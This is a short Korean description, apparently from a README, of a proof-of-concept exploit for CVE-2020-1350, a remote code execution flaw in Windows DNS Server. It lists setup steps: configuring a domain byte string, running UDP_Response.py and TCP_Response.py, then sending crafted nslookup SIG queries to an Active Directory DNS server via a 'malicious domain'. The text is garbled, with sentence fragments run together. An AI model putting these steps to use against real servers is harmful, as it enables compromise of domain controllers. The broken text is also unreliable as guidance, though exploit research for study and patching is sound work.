
CVE-2020-1350에 대한 개념 증명 익스플로잇으로, Windows DNS 서버의 치명적인 원격 코드 실행 취약점입니다. 제작된 DNS 쿼리를 통한 익스플로잇을 시연합니다.
CVE-2020-1350 개념 증명
33y0re.com으로 지정했다고 가정).blah는 0x4 바이트이고 .net은 0x3 바이트입니다).domain_correct를 \x04blah\03net\x00으로 설정합니다.python UDP_Response.py 및 python TCP_Response.py를 실행합니다.nslookup -type=sig 33y0re.com ACTIVE_DIRECTORY_DNS_SERVER_IP 그 다음에: nslookup -type=sig 9.MALICIOUS_DOMAIN_FROM_LINUX_BOX_SCRIPT ACTIVE_DIRECTORY_DNS_SERVER_IP